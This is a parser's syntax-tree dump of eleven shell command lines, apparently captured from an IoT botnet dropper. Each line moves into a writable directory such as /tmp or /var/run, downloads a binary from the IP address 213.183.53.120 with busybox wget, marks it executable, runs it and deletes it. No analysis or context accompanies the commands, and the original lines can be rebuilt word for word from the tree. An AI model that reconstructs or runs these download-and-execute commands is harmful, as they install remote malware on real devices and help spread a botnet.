ListNode(lineno=2, pos=(12, 190), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 113), parts=[
    WordNode(lineno=2, pos=(67, 79), word='/bin/busybox'),
    WordNode(lineno=2, pos=(80, 84), word='wget'),
    WordNode(lineno=2, pos=(85, 113), word='http://213.183.53.120/rwfwff'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(113, 114)),
  CommandNode(lineno=2, pos=(115, 148), parts=[
    WordNode(lineno=2, pos=(115, 119), word='wget'),
    WordNode(lineno=2, pos=(120, 148), word='http://213.183.53.120/rwfwff'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(148, 149)),
  CommandNode(lineno=2, pos=(150, 165), parts=[
    WordNode(lineno=2, pos=(150, 155), word='chmod'),
    WordNode(lineno=2, pos=(156, 158), word='+x'),
    WordNode(lineno=2, pos=(159, 165), word='rwfwff'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(165, 166)),
  CommandNode(lineno=2, pos=(167, 175), parts=[
    WordNode(lineno=2, pos=(167, 175), word='./rwfwff'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(175, 176)),
  CommandNode(lineno=2, pos=(177, 190), parts=[
    WordNode(lineno=2, pos=(177, 179), word='rm'),
    WordNode(lineno=2, pos=(180, 183), word='-rf'),
    WordNode(lineno=2, pos=(184, 190), word='rwfwff'),
  ]),
])
ListNode(lineno=3, pos=(191, 369), parts=[
  CommandNode(lineno=3, pos=(191, 198), parts=[
    WordNode(lineno=3, pos=(191, 193), word='cd'),
    WordNode(lineno=3, pos=(194, 198), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(199, 201)),
  CommandNode(lineno=3, pos=(202, 213), parts=[
    WordNode(lineno=3, pos=(202, 204), word='cd'),
    WordNode(lineno=3, pos=(205, 213), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(214, 216)),
  CommandNode(lineno=3, pos=(217, 224), parts=[
    WordNode(lineno=3, pos=(217, 219), word='cd'),
    WordNode(lineno=3, pos=(220, 224), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(225, 227)),
  CommandNode(lineno=3, pos=(228, 236), parts=[
    WordNode(lineno=3, pos=(228, 230), word='cd'),
    WordNode(lineno=3, pos=(231, 236), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(237, 239)),
  CommandNode(lineno=3, pos=(240, 244), parts=[
    WordNode(lineno=3, pos=(240, 242), word='cd'),
    WordNode(lineno=3, pos=(243, 244), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(244, 245)),
  CommandNode(lineno=3, pos=(246, 292), parts=[
    WordNode(lineno=3, pos=(246, 258), word='/bin/busybox'),
    WordNode(lineno=3, pos=(259, 263), word='wget'),
    WordNode(lineno=3, pos=(264, 292), word='http://213.183.53.120/fwcwcc'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(292, 293)),
  CommandNode(lineno=3, pos=(294, 327), parts=[
    WordNode(lineno=3, pos=(294, 298), word='wget'),
    WordNode(lineno=3, pos=(299, 327), word='http://213.183.53.120/fwcwcc'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(327, 328)),
  CommandNode(lineno=3, pos=(329, 344), parts=[
    WordNode(lineno=3, pos=(329, 334), word='chmod'),
    WordNode(lineno=3, pos=(335, 337), word='+x'),
    WordNode(lineno=3, pos=(338, 344), word='fwcwcc'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(344, 345)),
  CommandNode(lineno=3, pos=(346, 354), parts=[
    WordNode(lineno=3, pos=(346, 354), word='./fwcwcc'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(354, 355)),
  CommandNode(lineno=3, pos=(356, 369), parts=[
    WordNode(lineno=3, pos=(356, 358), word='rm'),
    WordNode(lineno=3, pos=(359, 362), word='-rf'),
    WordNode(lineno=3, pos=(363, 369), word='fwcwcc'),
  ]),
])
ListNode(lineno=4, pos=(370, 548), parts=[
  CommandNode(lineno=4, pos=(370, 377), parts=[
    WordNode(lineno=4, pos=(370, 372), word='cd'),
    WordNode(lineno=4, pos=(373, 377), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(378, 380)),
  CommandNode(lineno=4, pos=(381, 392), parts=[
    WordNode(lineno=4, pos=(381, 383), word='cd'),
    WordNode(lineno=4, pos=(384, 392), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(393, 395)),
  CommandNode(lineno=4, pos=(396, 403), parts=[
    WordNode(lineno=4, pos=(396, 398), word='cd'),
    WordNode(lineno=4, pos=(399, 403), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(404, 406)),
  CommandNode(lineno=4, pos=(407, 415), parts=[
    WordNode(lineno=4, pos=(407, 409), word='cd'),
    WordNode(lineno=4, pos=(410, 415), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(416, 418)),
  CommandNode(lineno=4, pos=(419, 423), parts=[
    WordNode(lineno=4, pos=(419, 421), word='cd'),
    WordNode(lineno=4, pos=(422, 423), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(423, 424)),
  CommandNode(lineno=4, pos=(425, 471), parts=[
    WordNode(lineno=4, pos=(425, 437), word='/bin/busybox'),
    WordNode(lineno=4, pos=(438, 442), word='wget'),
    WordNode(lineno=4, pos=(443, 471), word='http://213.183.53.120/tdgeew'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(471, 472)),
  CommandNode(lineno=4, pos=(473, 506), parts=[
    WordNode(lineno=4, pos=(473, 477), word='wget'),
    WordNode(lineno=4, pos=(478, 506), word='http://213.183.53.120/tdgeew'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(506, 507)),
  CommandNode(lineno=4, pos=(508, 523), parts=[
    WordNode(lineno=4, pos=(508, 513), word='chmod'),
    WordNode(lineno=4, pos=(514, 516), word='+x'),
    WordNode(lineno=4, pos=(517, 523), word='tdgeew'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(523, 524)),
  CommandNode(lineno=4, pos=(525, 533), parts=[
    WordNode(lineno=4, pos=(525, 533), word='./tdgeew'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(533, 534)),
  CommandNode(lineno=4, pos=(535, 548), parts=[
    WordNode(lineno=4, pos=(535, 537), word='rm'),
    WordNode(lineno=4, pos=(538, 541), word='-rf'),
    WordNode(lineno=4, pos=(542, 548), word='tdgeew'),
  ]),
])
ListNode(lineno=5, pos=(549, 727), parts=[
  CommandNode(lineno=5, pos=(549, 556), parts=[
    WordNode(lineno=5, pos=(549, 551), word='cd'),
    WordNode(lineno=5, pos=(552, 556), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(557, 559)),
  CommandNode(lineno=5, pos=(560, 571), parts=[
    WordNode(lineno=5, pos=(560, 562), word='cd'),
    WordNode(lineno=5, pos=(563, 571), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(572, 574)),
  CommandNode(lineno=5, pos=(575, 582), parts=[
    WordNode(lineno=5, pos=(575, 577), word='cd'),
    WordNode(lineno=5, pos=(578, 582), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(583, 585)),
  CommandNode(lineno=5, pos=(586, 594), parts=[
    WordNode(lineno=5, pos=(586, 588), word='cd'),
    WordNode(lineno=5, pos=(589, 594), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(595, 597)),
  CommandNode(lineno=5, pos=(598, 602), parts=[
    WordNode(lineno=5, pos=(598, 600), word='cd'),
    WordNode(lineno=5, pos=(601, 602), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(602, 603)),
  CommandNode(lineno=5, pos=(604, 650), parts=[
    WordNode(lineno=5, pos=(604, 616), word='/bin/busybox'),
    WordNode(lineno=5, pos=(617, 621), word='wget'),
    WordNode(lineno=5, pos=(622, 650), word='http://213.183.53.120/ceewfw'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(650, 651)),
  CommandNode(lineno=5, pos=(652, 685), parts=[
    WordNode(lineno=5, pos=(652, 656), word='wget'),
    WordNode(lineno=5, pos=(657, 685), word='http://213.183.53.120/ceewfw'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(685, 686)),
  CommandNode(lineno=5, pos=(687, 702), parts=[
    WordNode(lineno=5, pos=(687, 692), word='chmod'),
    WordNode(lineno=5, pos=(693, 695), word='+x'),
    WordNode(lineno=5, pos=(696, 702), word='ceewfw'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(702, 703)),
  CommandNode(lineno=5, pos=(704, 712), parts=[
    WordNode(lineno=5, pos=(704, 712), word='./ceewfw'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(712, 713)),
  CommandNode(lineno=5, pos=(714, 727), parts=[
    WordNode(lineno=5, pos=(714, 716), word='rm'),
    WordNode(lineno=5, pos=(717, 720), word='-rf'),
    WordNode(lineno=5, pos=(721, 727), word='ceewfw'),
  ]),
])
ListNode(lineno=6, pos=(728, 906), parts=[
  CommandNode(lineno=6, pos=(728, 735), parts=[
    WordNode(lineno=6, pos=(728, 730), word='cd'),
    WordNode(lineno=6, pos=(731, 735), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(736, 738)),
  CommandNode(lineno=6, pos=(739, 750), parts=[
    WordNode(lineno=6, pos=(739, 741), word='cd'),
    WordNode(lineno=6, pos=(742, 750), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(751, 753)),
  CommandNode(lineno=6, pos=(754, 761), parts=[
    WordNode(lineno=6, pos=(754, 756), word='cd'),
    WordNode(lineno=6, pos=(757, 761), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(762, 764)),
  CommandNode(lineno=6, pos=(765, 773), parts=[
    WordNode(lineno=6, pos=(765, 767), word='cd'),
    WordNode(lineno=6, pos=(768, 773), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(774, 776)),
  CommandNode(lineno=6, pos=(777, 781), parts=[
    WordNode(lineno=6, pos=(777, 779), word='cd'),
    WordNode(lineno=6, pos=(780, 781), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(781, 782)),
  CommandNode(lineno=6, pos=(783, 829), parts=[
    WordNode(lineno=6, pos=(783, 795), word='/bin/busybox'),
    WordNode(lineno=6, pos=(796, 800), word='wget'),
    WordNode(lineno=6, pos=(801, 829), word='http://213.183.53.120/ffweef'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(829, 830)),
  CommandNode(lineno=6, pos=(831, 864), parts=[
    WordNode(lineno=6, pos=(831, 835), word='wget'),
    WordNode(lineno=6, pos=(836, 864), word='http://213.183.53.120/ffweef'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(864, 865)),
  CommandNode(lineno=6, pos=(866, 881), parts=[
    WordNode(lineno=6, pos=(866, 871), word='chmod'),
    WordNode(lineno=6, pos=(872, 874), word='+x'),
    WordNode(lineno=6, pos=(875, 881), word='ffweef'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(881, 882)),
  CommandNode(lineno=6, pos=(883, 891), parts=[
    WordNode(lineno=6, pos=(883, 891), word='./ffweef'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(891, 892)),
  CommandNode(lineno=6, pos=(893, 906), parts=[
    WordNode(lineno=6, pos=(893, 895), word='rm'),
    WordNode(lineno=6, pos=(896, 899), word='-rf'),
    WordNode(lineno=6, pos=(900, 906), word='ffweef'),
  ]),
])
ListNode(lineno=7, pos=(907, 1085), parts=[
  CommandNode(lineno=7, pos=(907, 914), parts=[
    WordNode(lineno=7, pos=(907, 909), word='cd'),
    WordNode(lineno=7, pos=(910, 914), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(915, 917)),
  CommandNode(lineno=7, pos=(918, 929), parts=[
    WordNode(lineno=7, pos=(918, 920), word='cd'),
    WordNode(lineno=7, pos=(921, 929), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(930, 932)),
  CommandNode(lineno=7, pos=(933, 940), parts=[
    WordNode(lineno=7, pos=(933, 935), word='cd'),
    WordNode(lineno=7, pos=(936, 940), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(941, 943)),
  CommandNode(lineno=7, pos=(944, 952), parts=[
    WordNode(lineno=7, pos=(944, 946), word='cd'),
    WordNode(lineno=7, pos=(947, 952), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(953, 955)),
  CommandNode(lineno=7, pos=(956, 960), parts=[
    WordNode(lineno=7, pos=(956, 958), word='cd'),
    WordNode(lineno=7, pos=(959, 960), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(960, 961)),
  CommandNode(lineno=7, pos=(962, 1008), parts=[
    WordNode(lineno=7, pos=(962, 974), word='/bin/busybox'),
    WordNode(lineno=7, pos=(975, 979), word='wget'),
    WordNode(lineno=7, pos=(980, 1008), word='http://213.183.53.120/kfowef'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1008, 1009)),
  CommandNode(lineno=7, pos=(1010, 1043), parts=[
    WordNode(lineno=7, pos=(1010, 1014), word='wget'),
    WordNode(lineno=7, pos=(1015, 1043), word='http://213.183.53.120/kfowef'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1043, 1044)),
  CommandNode(lineno=7, pos=(1045, 1060), parts=[
    WordNode(lineno=7, pos=(1045, 1050), word='chmod'),
    WordNode(lineno=7, pos=(1051, 1053), word='+x'),
    WordNode(lineno=7, pos=(1054, 1060), word='kfowef'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1060, 1061)),
  CommandNode(lineno=7, pos=(1062, 1070), parts=[
    WordNode(lineno=7, pos=(1062, 1070), word='./kfowef'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1070, 1071)),
  CommandNode(lineno=7, pos=(1072, 1085), parts=[
    WordNode(lineno=7, pos=(1072, 1074), word='rm'),
    WordNode(lineno=7, pos=(1075, 1078), word='-rf'),
    WordNode(lineno=7, pos=(1079, 1085), word='kfowef'),
  ]),
])
ListNode(lineno=8, pos=(1086, 1264), parts=[
  CommandNode(lineno=8, pos=(1086, 1093), parts=[
    WordNode(lineno=8, pos=(1086, 1088), word='cd'),
    WordNode(lineno=8, pos=(1089, 1093), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1094, 1096)),
  CommandNode(lineno=8, pos=(1097, 1108), parts=[
    WordNode(lineno=8, pos=(1097, 1099), word='cd'),
    WordNode(lineno=8, pos=(1100, 1108), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1109, 1111)),
  CommandNode(lineno=8, pos=(1112, 1119), parts=[
    WordNode(lineno=8, pos=(1112, 1114), word='cd'),
    WordNode(lineno=8, pos=(1115, 1119), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1120, 1122)),
  CommandNode(lineno=8, pos=(1123, 1131), parts=[
    WordNode(lineno=8, pos=(1123, 1125), word='cd'),
    WordNode(lineno=8, pos=(1126, 1131), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1132, 1134)),
  CommandNode(lineno=8, pos=(1135, 1139), parts=[
    WordNode(lineno=8, pos=(1135, 1137), word='cd'),
    WordNode(lineno=8, pos=(1138, 1139), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1139, 1140)),
  CommandNode(lineno=8, pos=(1141, 1187), parts=[
    WordNode(lineno=8, pos=(1141, 1153), word='/bin/busybox'),
    WordNode(lineno=8, pos=(1154, 1158), word='wget'),
    WordNode(lineno=8, pos=(1159, 1187), word='http://213.183.53.120/dwqdqq'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1187, 1188)),
  CommandNode(lineno=8, pos=(1189, 1222), parts=[
    WordNode(lineno=8, pos=(1189, 1193), word='wget'),
    WordNode(lineno=8, pos=(1194, 1222), word='http://213.183.53.120/dwqdqq'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1222, 1223)),
  CommandNode(lineno=8, pos=(1224, 1239), parts=[
    WordNode(lineno=8, pos=(1224, 1229), word='chmod'),
    WordNode(lineno=8, pos=(1230, 1232), word='+x'),
    WordNode(lineno=8, pos=(1233, 1239), word='dwqdqq'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1239, 1240)),
  CommandNode(lineno=8, pos=(1241, 1249), parts=[
    WordNode(lineno=8, pos=(1241, 1249), word='./dwqdqq'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1249, 1250)),
  CommandNode(lineno=8, pos=(1251, 1264), parts=[
    WordNode(lineno=8, pos=(1251, 1253), word='rm'),
    WordNode(lineno=8, pos=(1254, 1257), word='-rf'),
    WordNode(lineno=8, pos=(1258, 1264), word='dwqdqq'),
  ]),
])
ListNode(lineno=9, pos=(1265, 1443), parts=[
  CommandNode(lineno=9, pos=(1265, 1272), parts=[
    WordNode(lineno=9, pos=(1265, 1267), word='cd'),
    WordNode(lineno=9, pos=(1268, 1272), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1273, 1275)),
  CommandNode(lineno=9, pos=(1276, 1287), parts=[
    WordNode(lineno=9, pos=(1276, 1278), word='cd'),
    WordNode(lineno=9, pos=(1279, 1287), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1288, 1290)),
  CommandNode(lineno=9, pos=(1291, 1298), parts=[
    WordNode(lineno=9, pos=(1291, 1293), word='cd'),
    WordNode(lineno=9, pos=(1294, 1298), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1299, 1301)),
  CommandNode(lineno=9, pos=(1302, 1310), parts=[
    WordNode(lineno=9, pos=(1302, 1304), word='cd'),
    WordNode(lineno=9, pos=(1305, 1310), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1311, 1313)),
  CommandNode(lineno=9, pos=(1314, 1318), parts=[
    WordNode(lineno=9, pos=(1314, 1316), word='cd'),
    WordNode(lineno=9, pos=(1317, 1318), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1318, 1319)),
  CommandNode(lineno=9, pos=(1320, 1366), parts=[
    WordNode(lineno=9, pos=(1320, 1332), word='/bin/busybox'),
    WordNode(lineno=9, pos=(1333, 1337), word='wget'),
    WordNode(lineno=9, pos=(1338, 1366), word='http://213.183.53.120/wweccc'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1366, 1367)),
  CommandNode(lineno=9, pos=(1368, 1401), parts=[
    WordNode(lineno=9, pos=(1368, 1372), word='wget'),
    WordNode(lineno=9, pos=(1373, 1401), word='http://213.183.53.120/wweccc'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1401, 1402)),
  CommandNode(lineno=9, pos=(1403, 1418), parts=[
    WordNode(lineno=9, pos=(1403, 1408), word='chmod'),
    WordNode(lineno=9, pos=(1409, 1411), word='+x'),
    WordNode(lineno=9, pos=(1412, 1418), word='wweccc'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1418, 1419)),
  CommandNode(lineno=9, pos=(1420, 1428), parts=[
    WordNode(lineno=9, pos=(1420, 1428), word='./wweccc'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1428, 1429)),
  CommandNode(lineno=9, pos=(1430, 1443), parts=[
    WordNode(lineno=9, pos=(1430, 1432), word='rm'),
    WordNode(lineno=9, pos=(1433, 1436), word='-rf'),
    WordNode(lineno=9, pos=(1437, 1443), word='wweccc'),
  ]),
])
ListNode(lineno=10, pos=(1444, 1622), parts=[
  CommandNode(lineno=10, pos=(1444, 1451), parts=[
    WordNode(lineno=10, pos=(1444, 1446), word='cd'),
    WordNode(lineno=10, pos=(1447, 1451), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1452, 1454)),
  CommandNode(lineno=10, pos=(1455, 1466), parts=[
    WordNode(lineno=10, pos=(1455, 1457), word='cd'),
    WordNode(lineno=10, pos=(1458, 1466), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1467, 1469)),
  CommandNode(lineno=10, pos=(1470, 1477), parts=[
    WordNode(lineno=10, pos=(1470, 1472), word='cd'),
    WordNode(lineno=10, pos=(1473, 1477), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1478, 1480)),
  CommandNode(lineno=10, pos=(1481, 1489), parts=[
    WordNode(lineno=10, pos=(1481, 1483), word='cd'),
    WordNode(lineno=10, pos=(1484, 1489), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1490, 1492)),
  CommandNode(lineno=10, pos=(1493, 1497), parts=[
    WordNode(lineno=10, pos=(1493, 1495), word='cd'),
    WordNode(lineno=10, pos=(1496, 1497), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1497, 1498)),
  CommandNode(lineno=10, pos=(1499, 1545), parts=[
    WordNode(lineno=10, pos=(1499, 1511), word='/bin/busybox'),
    WordNode(lineno=10, pos=(1512, 1516), word='wget'),
    WordNode(lineno=10, pos=(1517, 1545), word='http://213.183.53.120/kfcedd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1545, 1546)),
  CommandNode(lineno=10, pos=(1547, 1580), parts=[
    WordNode(lineno=10, pos=(1547, 1551), word='wget'),
    WordNode(lineno=10, pos=(1552, 1580), word='http://213.183.53.120/kfcedd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1580, 1581)),
  CommandNode(lineno=10, pos=(1582, 1597), parts=[
    WordNode(lineno=10, pos=(1582, 1587), word='chmod'),
    WordNode(lineno=10, pos=(1588, 1590), word='+x'),
    WordNode(lineno=10, pos=(1591, 1597), word='kfcedd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1597, 1598)),
  CommandNode(lineno=10, pos=(1599, 1607), parts=[
    WordNode(lineno=10, pos=(1599, 1607), word='./kfcedd'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1607, 1608)),
  CommandNode(lineno=10, pos=(1609, 1622), parts=[
    WordNode(lineno=10, pos=(1609, 1611), word='rm'),
    WordNode(lineno=10, pos=(1612, 1615), word='-rf'),
    WordNode(lineno=10, pos=(1616, 1622), word='kfcedd'),
  ]),
])
ListNode(lineno=11, pos=(1623, 1801), parts=[
  CommandNode(lineno=11, pos=(1623, 1630), parts=[
    WordNode(lineno=11, pos=(1623, 1625), word='cd'),
    WordNode(lineno=11, pos=(1626, 1630), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1631, 1633)),
  CommandNode(lineno=11, pos=(1634, 1645), parts=[
    WordNode(lineno=11, pos=(1634, 1636), word='cd'),
    WordNode(lineno=11, pos=(1637, 1645), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1646, 1648)),
  CommandNode(lineno=11, pos=(1649, 1656), parts=[
    WordNode(lineno=11, pos=(1649, 1651), word='cd'),
    WordNode(lineno=11, pos=(1652, 1656), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1657, 1659)),
  CommandNode(lineno=11, pos=(1660, 1668), parts=[
    WordNode(lineno=11, pos=(1660, 1662), word='cd'),
    WordNode(lineno=11, pos=(1663, 1668), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1669, 1671)),
  CommandNode(lineno=11, pos=(1672, 1676), parts=[
    WordNode(lineno=11, pos=(1672, 1674), word='cd'),
    WordNode(lineno=11, pos=(1675, 1676), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1676, 1677)),
  CommandNode(lineno=11, pos=(1678, 1724), parts=[
    WordNode(lineno=11, pos=(1678, 1690), word='/bin/busybox'),
    WordNode(lineno=11, pos=(1691, 1695), word='wget'),
    WordNode(lineno=11, pos=(1696, 1724), word='http://213.183.53.120/cocain'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1724, 1725)),
  CommandNode(lineno=11, pos=(1726, 1759), parts=[
    WordNode(lineno=11, pos=(1726, 1730), word='wget'),
    WordNode(lineno=11, pos=(1731, 1759), word='http://213.183.53.120/cocain'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1759, 1760)),
  CommandNode(lineno=11, pos=(1761, 1776), parts=[
    WordNode(lineno=11, pos=(1761, 1766), word='chmod'),
    WordNode(lineno=11, pos=(1767, 1769), word='+x'),
    WordNode(lineno=11, pos=(1770, 1776), word='cocain'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1776, 1777)),
  CommandNode(lineno=11, pos=(1778, 1786), parts=[
    WordNode(lineno=11, pos=(1778, 1786), word='./cocain'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1786, 1787)),
  CommandNode(lineno=11, pos=(1788, 1801), parts=[
    WordNode(lineno=11, pos=(1788, 1790), word='rm'),
    WordNode(lineno=11, pos=(1791, 1794), word='-rf'),
    WordNode(lineno=11, pos=(1795, 1801), word='cocain'),
  ]),
])
ListNode(lineno=12, pos=(1802, 1980), parts=[
  CommandNode(lineno=12, pos=(1802, 1809), parts=[
    WordNode(lineno=12, pos=(1802, 1804), word='cd'),
    WordNode(lineno=12, pos=(1805, 1809), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1810, 1812)),
  CommandNode(lineno=12, pos=(1813, 1824), parts=[
    WordNode(lineno=12, pos=(1813, 1815), word='cd'),
    WordNode(lineno=12, pos=(1816, 1824), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1825, 1827)),
  CommandNode(lineno=12, pos=(1828, 1835), parts=[
    WordNode(lineno=12, pos=(1828, 1830), word='cd'),
    WordNode(lineno=12, pos=(1831, 1835), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1836, 1838)),
  CommandNode(lineno=12, pos=(1839, 1847), parts=[
    WordNode(lineno=12, pos=(1839, 1841), word='cd'),
    WordNode(lineno=12, pos=(1842, 1847), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1848, 1850)),
  CommandNode(lineno=12, pos=(1851, 1855), parts=[
    WordNode(lineno=12, pos=(1851, 1853), word='cd'),
    WordNode(lineno=12, pos=(1854, 1855), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1855, 1856)),
  CommandNode(lineno=12, pos=(1857, 1903), parts=[
    WordNode(lineno=12, pos=(1857, 1869), word='/bin/busybox'),
    WordNode(lineno=12, pos=(1870, 1874), word='wget'),
    WordNode(lineno=12, pos=(1875, 1903), word='http://213.183.53.120/analsx'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1903, 1904)),
  CommandNode(lineno=12, pos=(1905, 1938), parts=[
    WordNode(lineno=12, pos=(1905, 1909), word='wget'),
    WordNode(lineno=12, pos=(1910, 1938), word='http://213.183.53.120/analsx'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1938, 1939)),
  CommandNode(lineno=12, pos=(1940, 1955), parts=[
    WordNode(lineno=12, pos=(1940, 1945), word='chmod'),
    WordNode(lineno=12, pos=(1946, 1948), word='+x'),
    WordNode(lineno=12, pos=(1949, 1955), word='analsx'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1955, 1956)),
  CommandNode(lineno=12, pos=(1957, 1965), parts=[
    WordNode(lineno=12, pos=(1957, 1965), word='./analsx'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1965, 1966)),
  CommandNode(lineno=12, pos=(1967, 1980), parts=[
    WordNode(lineno=12, pos=(1967, 1969), word='rm'),
    WordNode(lineno=12, pos=(1970, 1973), word='-rf'),
    WordNode(lineno=12, pos=(1974, 1980), word='analsx'),
  ]),
])
